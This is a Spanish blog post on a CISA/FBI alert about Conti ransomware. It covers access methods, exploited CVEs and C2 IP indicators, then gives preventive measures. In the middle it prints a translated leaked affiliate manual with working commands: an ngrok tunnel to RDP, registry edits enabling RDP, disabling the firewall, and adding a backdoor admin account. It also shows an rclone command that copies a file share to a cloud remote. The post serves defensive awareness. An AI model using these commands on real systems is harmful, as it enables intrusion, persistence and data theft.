Alerta! Ransomware “Conti”, medidas preventivas y publicación de las herramientas usadas por los atacantes

8 min readSep 23, 2021

CISAs (Cybersecurity Infraestucure Security Agency) y el FBI el 22 de setiembre ha publicado una alerta sobre la propación del Ransomware Conti en más de 400 organizaciones estadounidenses e internacionales.

Acciones rápidas:

-Utilizar autenticación Multifactor MFA.
Segmentar y segregar redes y funciones.
Actualize su sistema operativo y software.

Metodos de Acceso Inicial:

El Ransomware Conti esta desarrollado bajo el modelo Raas (Ransomware as a Service), los métodos de acceso a inicial a las redes de las victimas:

Campañas de spearphishing que utilizan correos electrónicos personalizados que contienen archivos adjuntos maliciosos. Los archivos adjuntos maliciosos de Word contienen scripts + malware (TrickBot e IcedID, Cobalt Strike, para el movimiento lateral)
Credenciales de Protocolo de escritorio remoto (RDP) robadas o débiles.
Llamadas telefónicas. ( Algo nuevo!!!!)
Software falso promocionado a través de la optimización de motores de búsqueda ;Otras redes de distribución de malware (por ejemplo, ZLoader).
Vulnerabilidades comunes en activos externos, aqui hacer revisiones periódicas frecuentes a todos sus activos expuestos.

Vulnerabilidades aprovechadas en la red Interna:

Los actores del Ransomware Conti también explotan vulnerabilidades en activos no parchados, para moverse en la red interna realizando movimientos laterales, como:

2017 vulnerabilidades del servidor Microsoft Windows Server Message Block.
Vulnerabilidad “PrintNightmare” (CVE-2021–34527) en el servicio de cola de impresión de Windows.
Vulnerabilidad “Zerologon” (CVE-2020–1472) en sistemas Microsoft Active Directory Domain Controller.

IOCs (Indicadores de Compromiso):

De los artefactos filtrados se han identificado cuatro direcciones IP del servidor Cobalt Strike que los actores del Ransomware Conti usaban anteriormente para comunicarse con su servidor de C2 (comando y control):

162.244.80[.]235
85.93.88[.]165
185.141.63[.]120
82.118.21[.]1

Capturas de pantalla de las direcciones IP donde la banda de Conti aloja los servidores de comando y control de Cobalt Strike, que los miembros afiliados de Conti utilizan para acceder a las redes de la empresa hackeadas.

Fuentes: https://therecord.media y post original.

Afiliado de ransomware descontento filtra los manuales técnicos del grupo Conti Ransom:

De acuerdo a la información de Therecord, se filtro las conversaciones de unos de las personas afiliados a este modelo RaaS (Ransomware as a Service), donde indica que reclutan penetration testers para probar Active Directory de las redes.

Fuente: TheRECORD

También se comparten capturas de pantalla de las direcciones IP que el grupo de atacantes de la familia Conti alojan servidores de Comando y Control de Cobalt Strike que los miembros afiliados de Conti utilizan para acceder a las redes de la empresa pirateadas.

Fuente: TheRECORD

De la primera captura se puede observar que en un 2do post el usuario m1Geelka, publica Manuals and Software:

Manuales y Software utilizados:

La pesona comparte un archivo que contiene manuales y software que usa este grupo de ransom #Conti:

El enlace en sendspace.com/file/qmgq3v a la fecha ya esta desactivado.Sin embargo en algunos foros el archivo esta filtrado, los manuales y software que usa este grupo, la mayoria de material esta en ruso, pero sí te permite entender algunas herramientas y procedimientos que les compartes a sus afiliados. Agradecer a Andres Morales por esta colaboración.

Por ejemplo, herramienta: Pentest SQL

Fuente: https://github.com/NetSPI/PowerUpSQL/wiki

Herramienta: RDP NGROK

En las otras herramientas observo que hay una de RDP NGROK, el procedimiento esta en ruso, vamos intentar traducirlo y ver que trata de ejecutar, archivo original:

La traducción a español podría tener errores pero nos permite tener una idea general:

Inicio del manual “RDP NGROK.txt”:

Regístrese en https://ngrok.com/
- Descarga ngrok.exe y cárgalo en la carretilla

En el menú del panel de la cuenta de ngrok, seleccione “Su token de autenticación”.
Copie el comando con el token (sin ./). Por ejemplo:
ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg

- Entramos en la carretilla y escribimos:
shell ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg

- Lanzamos un túnel al puerto RDP:
shell ngrok tcp 3389

- Abrimos el RDP en carretilla:
shell reg agregar “HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server” / v fDenyTSConnections / t REG_DWORD / d 0 / f && reg agregar “HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server” / v fAllowToGetHelp 1 / f

shell NetSh Advfirewall desactivó el estado de todos los perfiles //desactiva el fw, perfiles.

shell netsh advfirewall firewall set rule group = “escritorio remoto” nueva habilitación = Sí

shell netsh firewall set service type = remotedesktop mode = enable

- Podemos agregar un usuario separado bajo ngrok: //agrega usuario Admin
shell net usuario Admin Password1 / add
Shell net localgroup Administradores Admin / agregar //grupo Administrdores

- Vaya al panel de la cuenta ngrok — compruebe el túnel (“Puntos finales — Estado”).
Copie IP: puerto desde allí y vaya a cualquier cliente RDP. Nos conectamos (también puedes usar la cuenta que creamos).

Fuente: RDP NGROK.txt (Traducio a español, con errores de la traducción)

Herramienta: RCLONE

Usa rclone para llevarse los archivos de la red interna hacia la nube:

shell rclone.exe copy “\\trucamtldc01\E$\Data” remote:Data -q — ignore-existing — auto-confirm — multi-thread-streams 12 — transfers 12

################

Medidas Preventivas:

Finalmente, compartiré algunas medidas preventivas con el objetivo de protegernos frente a ransomware:

Backup, Backup, Restore, Restore.
Utilizar MFA autenticación multifactor.
Implementar Segmentación de la red y filtrar el tráfico.
Filtre el tráfico de la red para prohibir las comunicaciones de entrada y salida con direcciones IP maliciosas conocidas.
Habilite filtros de spam sólidos para evitar que los correos electrónicos de phishing lleguen a los usuarios finales. Filtre los correos electrónicos que contengan archivos ejecutables para evitar que lleguen a los usuarios finales.
Implemente un programa de capacitación de usuarios para que reporten y no ingresen a sitios web maliciosos o abrir archivos adjuntos maliciosos.
Filtro URL y contenido Web: Implemente una lista de bloqueo y / o lista de permisos de URL para evitar que los usuarios accedan a sitios web maliciosos.
Vulnerabilidades:
-Implemente un proceso de Gestión de vulnerabilidades, que permite buscar regularmente vulnerabilidades y mantenga el software de S. O., aplicaicones, actualizado.
Anti Malware:
-Active Agentes de seguridad EDR/XDR en los servidores críticos y estaciones que permita reconocer y bloquear actividada maliciosa utilizando no solamente firmas si no teambien utilizando tecnicas basadas en comportamiento usando algoritmos de IA.
Sistema Operativos:
Implemente un proceso de gestión de parches para sistemas operativos, acualice el software y los sistemas operativos, las aplicaciones y el firmware de los activos de red de manera oportuna.
Considere la posibilidad de utilizar un sistema de gestión de parches centralizado.
Software/ Aplicaciones:
-Elimine aplicaciones innecesarias y aplique controles.
-Elimine cualquier aplicación que no se considere necesaria para las operaciones diarias.
- Investigue cualquier software no autorizado, especialmente el software de escritorio remoto o de supervisión y gestión remotas.
- Implementar la lista de permisos de aplicaciones, que solo permite que los sistemas ejecuten programas conocidos y permitidos por la política de seguridad de la organización.

Anexo 1 :

Vulnerabilidades utilizadas en la red interna para movimiento lateral:

1.- 2017 vulnerabilidades del servidor Microsoft Windows Server Message Block.

MS17–010: Actualización de seguridad para Windows Server de SMB: 14 de marzo de 2017

Permite la ejecución remota de código si un atacante envía mensajes especialmente diseñados a un servidor de Microsoft Server Message Block 1.0 (SMBv1).